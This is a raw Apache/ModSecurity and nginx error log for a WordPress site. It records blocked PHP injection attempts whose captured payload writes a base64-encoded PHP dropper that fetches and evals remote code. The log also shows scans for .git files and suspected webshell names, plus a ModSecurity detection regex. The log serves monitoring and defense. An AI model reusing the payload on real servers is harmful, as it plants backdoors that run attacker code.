ARGS:google. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:google: echo 'X7ROOT';fwrite(fopen('../about.php','w+'),base64_decode('PD9waHAKICBmdW5jdGlvbiBnZXQoJHVybCkgewogICAgICAkY2ggPSBjdXJsX2luaXQoKTsKICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgMCk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICR1cmwpOwogICAgICAkZGF0YSA9IGN1cmxfZXhlYygkY2gpOwogICAgICBjdXJsX2Nsb3NlKCRjaCk7CiAgICAgIHJldHVybiAkZGF0YTsKICB9CiAgJG9rID0gJz8+JzsKICBldmFsKCIkb2siIC4gZ2V..."] [severity "CR [hostname "investigacionperu.com"] [uri "/wp-content/plugins/about.php"] [unique_id "Z9hovvI_2HFSz8BNOlK0MAAAAI8"], referer: http://investigacionperu.com [Mon Mar 17 13:24:00.419496 2025] [:error] [pid 2483:tid 140297264436992] [client 13.40.37.100:47816] [client 13.40.37.100] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:google. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:google: echo 'X7ROOT';fwrite(fopen('../about.php','w+'),base64_decode('PD9waHAKICBmdW5jdGlvbiBnZXQoJHVybCkgewogICAgICAkY2ggPSBjdXJsX2luaXQoKTsKICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgMCk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICR1cmwpOwogICAgICAkZGF0YSA9IGN1cmxfZXhlYygkY2gpOwogICAgICBjdXJsX2Nsb3NlKCRjaCk7CiAgICAgIHJldHVybiAkZGF0YTsKICB9CiAgJG9rID0gJz8+JzsKICBldmFsKCIkb2siIC4gZ2V..."] [severity "CR [hostname "investigacionperu.com"] [uri "/wp-content/plugins/about.php"] [unique_id "Z9howMKiC7I_9nqGpoaAPgAAAEQ"], referer: http://investigacionperu.com [Mon Mar 17 13:24:01.543780 2025] [:error] [pid 2482:tid 140297128347392] [client 13.40.37.100:47820] [client 13.40.37.100] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:css. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:css: echo 'X7ROOT';fwrite(fopen('/about.php','w+'),base64_decode('PD9waHAKICBmdW5jdGlvbiBnZXQoJHVybCkgewogICAgICAkY2ggPSBjdXJsX2luaXQoKTsKICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgMCk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICR1cmwpOwogICAgICAkZGF0YSA9IGN1cmxfZXhlYygkY2gpOwogICAgICBjdXJsX2Nsb3NlKCRjaCk7CiAgICAgIHJldHVybiAkZGF0YTsKICB9CiAgJG9rID0gJz8+JzsKICBldmFsKCIkb2siIC4gZ2V0KCdo..."] [severity "CRITI [hostname "investigacionperu.com"] [uri "/wp-content/plugins/about.php"] [unique_id "Z9howQnET2lOE4KCY_x_ZAAAAAw"], referer: http://investigacionperu.com [Mon Mar 17 13:24:02.839912 2025] [:error] [pid 2484:tid 140297161918208] [client 13.40.37.100:47826] [client 13.40.37.100] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:css. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:css: echo 'X7ROOT';fwrite(fopen('/about.php','w+'),base64_decode('PD9waHAKICBmdW5jdGlvbiBnZXQoJHVybCkgewogICAgICAkY2ggPSBjdXJsX2luaXQoKTsKICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgMCk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICR1cmwpOwogICAgICAkZGF0YSA9IGN1cmxfZXhlYygkY2gpOwogICAgICBjdXJsX2Nsb3NlKCRjaCk7CiAgICAgIHJldHVybiAkZGF0YTsKICB9CiAgJG9rID0gJz8+JzsKICBldmFsKCIkb2siIC4gZ2V0KCdo..."] [severity "CRITI [hostname "investigacionperu.com"] [uri "/wp-content/plugins/about.php"] [unique_id "Z9howvI_2HFSz8BNOlK0NgAAAIg"], referer: http://investigacionperu.com [Mon Mar 17 13:24:04.065456 2025] [:error] [pid 2483:tid 140297272829696] [client 13.40.37.100:47830] [client 13.40.37.100] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:js. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:js: echo 'X7ROOT';fwrite(fopen('/about.php','w+'),base64_decode('PD9waHAKICBmdW5jdGlvbiBnZXQoJHVybCkgewogICAgICAkY2ggPSBjdXJsX2luaXQoKTsKICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgMCk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICR1cmwpOwogICAgICAkZGF0YSA9IGN1cmxfZXhlYygkY2gpOwogICAgICBjdXJsX2Nsb3NlKCRjaCk7CiAgICAgIHJldHVybiAkZGF0YTsKICB9CiAgJG9rID0gJz8+JzsKICBldmFsKCIkb2siIC4gZ2V0KCdod..."] [severity "CRITIC [hostname "investigacionperu.com"] [uri "/wp-content/plugins/about.php"] [unique_id "Z9hoxMKiC7I_9nqGpoaAQAAAAEM"], referer: http://investigacionperu.com [Mon Mar 17 13:24:05.249749 2025] [:error] [pid 2483:tid 140297187096320] [client 13.40.37.100:47834] [client 13.40.37.100] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:js. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:js: echo 'X7ROOT';fwrite(fopen('/about.php','w+'),base64_decode('PD9waHAKICBmdW5jdGlvbiBnZXQoJHVybCkgewogICAgICAkY2ggPSBjdXJsX2luaXQoKTsKICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgMCk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICR1cmwpOwogICAgICAkZGF0YSA9IGN1cmxfZXhlYygkY2gpOwogICAgICBjdXJsX2Nsb3NlKCRjaCk7CiAgICAgIHJldHVybiAkZGF0YTsKICB9CiAgJG9rID0gJz8+JzsKICBldmFsKCIkb2siIC4gZ2V0KCdod..."] [severity "CRITIC [hostname "investigacionperu.com"] [uri "/wp-content/plugins/about.php"] [unique_id "Z9hoxcKiC7I_9nqGpoaAQQAAAEU"], referer: http://investigacionperu.com [Mon Mar 17 13:24:06.321743 2025] [:error] [pid 2483:tid 140297136740096] [client 13.40.37.100:47842] [client 13.40.37.100] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:wp. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:wp: echo 'X7ROOT';fwrite(fopen('/about.php','w+'),base64_decode('PD9waHAKICBmdW5jdGlvbiBnZXQoJHVybCkgewogICAgICAkY2ggPSBjdXJsX2luaXQoKTsKICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgMCk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICR1cmwpOwogICAgICAkZGF0YSA9IGN1cmxfZXhlYygkY2gpOwogICAgICBjdXJsX2Nsb3NlKCRjaCk7CiAgICAgIHJldHVybiAkZGF0YTsKICB9CiAgJG9rID0gJz8+JzsKICBldmFsKCIkb2siIC4gZ2V0KCdod..."] [severity "CRITIC [hostname "investigacionperu.com"] [uri "/wp.php"] [unique_id "Z9hoxsKiC7I_9nqGpoaAQwAAAEs"], referer: http://investigacionperu.com [Mon Mar 17 13:24:07.436969 2025] [:error] [pid 2483:tid 140297077991168] [client 13.40.37.100:47846] [client 13.40.37.100] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:wp. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:wp: echo 'X7ROOT';fwrite(fopen('/about.php','w+'),base64_decode('PD9waHAKICBmdW5jdGlvbiBnZXQoJHVybCkgewogICAgICAkY2ggPSBjdXJsX2luaXQoKTsKICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgMCk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICR1cmwpOwogICAgICAkZGF0YSA9IGN1cmxfZXhlYygkY2gpOwogICAgICBjdXJsX2Nsb3NlKCRjaCk7CiAgICAgIHJldHVybiAkZGF0YTsKICB9CiAgJG9rID0gJz8+JzsKICBldmFsKCIkb2siIC4gZ2V0KCdod..."] [severity "CRITIC [hostname "investigacionperu.com"] [uri "/wp.php"] [unique_id "Z9hox8KiC7I_9nqGpoaARQAAAFI"], referer: http://investigacionperu.com [Mon Mar 17 16:21:41.643250 2025] [autoindex:error] [pid 3031:tid 140297111561984] [client 64.227.143.222:50528] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue Mar 18 03:13:22.667635 2025] [ssl:warn] [pid 16323:tid 140547240998784] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Mar 18 03:13:22.943101 2025] [ssl:warn] [pid 16324:tid 140547240998784] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Mar 18 03:13:23.601367 2025] [ssl:warn] [pid 16324:tid 140547240998784] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Mar 18 03:13:28.519101 2025] [ssl:warn] [pid 16324:tid 140547240998784] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Mar 18 03:13:32.318339 2025] [ssl:warn] [pid 16862:tid 140293589632896] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Mar 18 03:13:32.547587 2025] [ssl:warn] [pid 16863:tid 140293589632896] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Mar 18 08:37:53.162752 2025] [autoindex:error] [pid 16880:tid 140293160498944] [client 161.97.132.59:36170] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2025/03/18 13:03:36 [error] 16815#16815: *319741 access forbidden by rule, client: 45.148.10.98, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/18 13:12:08 [error] 16816#16816: *319905 access forbidden by rule, client: 45.148.10.98, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2025/03/18 13:17:59 [error] 16816#16816: *319963 access forbidden by rule, client: 45.148.10.98, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" [Tue Mar 18 13:27:25.266333 2025] [authz_core:error] [pid 16880:tid 140293244425984] [client 68.183.9.16:41890] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/03/18 13:27:33 [error] 16816#16816: *320051 access forbidden by rule, client: 68.183.9.16, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Tue Mar 18 15:45:14.819543 2025] [authz_core:error] [pid 17467:tid 140293373314816] [client 64.225.75.246:44408] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/03/18 15:45:23 [error] 16815#16815: *321436 access forbidden by rule, client: 64.225.75.246, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Tue Mar 18 16:18:12.656910 2025] [:error] [pid 17467:tid 140293277996800] [client 185.223.152.145:45442] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/investig/public_html/wp-content/plugins/hello-dolly/hello.php:69 [Tue Mar 18 16:18:12.657049 2025] [:error] [pid 17467:tid 140293277996800] [client 185.223.152.145:45442] Stack trace: [Tue Mar 18 16:18:12.657074 2025] [:error] [pid 17467:tid 140293277996800] [client 185.223.152.145:45442] #0 {main} [Tue Mar 18 16:18:12.657186 2025] [:error] [pid 17467:tid 140293277996800] [client 185.223.152.145:45442] thrown in /home/investig/public_html/wp-content/plugins/hello-dolly/hello.php on line 69 [Tue Mar 18 16:18:26.337545 2025] [autoindex:error] [pid 17467:tid 140293177284352] [client 185.223.152.145:45470] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/css/index.php [Tue Mar 18 16:18:32.519753 2025] [autoindex:error] [pid 17467:tid 140293202462464] [client 185.223.152.145:45492] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/js/index.php [Tue Mar 18 16:18:42.448145 2025] [autoindex:error] [pid 16882:tid 140293390100224] [client 185.223.152.145:45536] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/maint/index.php [Tue Mar 18 16:18:48.936347 2025] [autoindex:error] [pid 16882:tid 140293135320832] [client 185.223.152.145:45548] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 18 16:18:50.140667 2025] [autoindex:error] [pid 17467:tid 140293227640576] [client 185.223.152.145:45552] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-content/uploads/index.php [Tue Mar 18 16:19:04.549570 2025] [autoindex:error] [pid 16881:tid 140293398492928] [client 185.223.152.145:45586] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/css/index.php [Tue Mar 18 16:19:04.808461 2025] [:error] [pid 16881:tid 140293194069760] [client 185.223.152.145:45588] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/moon.php [Tue Mar 18 16:19:07.212382 2025] [autoindex:error] [pid 17467:tid 140293210855168] [client 185.223.152.145:45596] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/ID3/index.php [Tue Mar 18 16:19:09.397301 2025] [autoindex:error] [pid 16880:tid 140293244425984] [client 185.223.152.145:45604] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/images/index.php [Tue Mar 18 16:19:23.646121 2025] [autoindex:error] [pid 16882:tid 140293168891648] [client 185.223.152.145:45638] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/index.php [Tue Mar 18 16:19:30.042432 2025] [autoindex:error] [pid 16881:tid 140293135320832] [client 185.223.152.145:45652] AH01276: Cannot serve directory /home/investig/public_html/wp-content/languages/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-content/languages/index.php [Tue Mar 18 16:19:33.668985 2025] [autoindex:error] [pid 16882:tid 140293381707520] [client 185.223.152.145:45660] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/SimplePie/index.php [Tue Mar 18 16:19:38.267883 2025] [autoindex:error] [pid 16880:tid 140293143713536] [client 185.223.152.145:45674] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/assets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/assets/index.php [Tue Mar 18 16:19:39.413743 2025] [autoindex:error] [pid 17467:tid 140293261211392] [client 185.223.152.145:45678] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/index.php [Tue Mar 18 16:19:41.646995 2025] [:error] [pid 16882:tid 140293390100224] [client 185.223.152.145:45684] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Tue Mar 18 16:20:01.009012 2025] [autoindex:error] [pid 16881:tid 140293152106240] [client 185.223.152.145:45728] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/customize/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/customize/index.php [Tue Mar 18 16:20:07.591584 2025] [autoindex:error] [pid 16882:tid 140293373314816] [client 185.223.152.145:45740] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/fonts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/fonts/index.php [Tue Mar 18 16:20:20.152095 2025] [autoindex:error] [pid 17467:tid 140293373314816] [client 185.223.152.145:45774] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/blue/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 18 16:20:29.570840 2025] [autoindex:error] [pid 17467:tid 140293219247872] [client 185.223.152.145:45794] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/rest-api/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/rest-api/index.php [Tue Mar 18 16:20:43.622140 2025] [:error] [pid 16881:tid 140293261211392] [client 185.223.152.145:45826] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Tue Mar 18 16:20:44.937911 2025] [autoindex:error] [pid 17467:tid 140293390100224] [client 185.223.152.145:45830] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/colors/index.php [Tue Mar 18 16:21:00.203402 2025] [:error] [pid 17467:tid 140293286389504] [client 185.223.152.145:45864] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Tue Mar 18 16:21:16.918662 2025] [:error] [pid 16880:tid 140293210855168] [client 185.223.152.145:45898] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/upfile.php [Tue Mar 18 16:21:31.218420 2025] [autoindex:error] [pid 16880:tid 140293135320832] [client 185.223.152.145:45928] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/colors/coffee/index.php [Tue Mar 18 16:22:06.815434 2025] [:error] [pid 17467:tid 140293294782208] [client 185.223.152.145:46002] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php 2025/03/18 16:44:22 [error] 16815#16815: *322387 access forbidden by rule, client: 170.39.218.246, server: cpanel.investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "cpanel.investigacionperu.com" [Tue Mar 18 17:01:39.627821 2025] [autoindex:error] [pid 17467:tid 140293252818688] [client 64.227.143.222:46728] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex 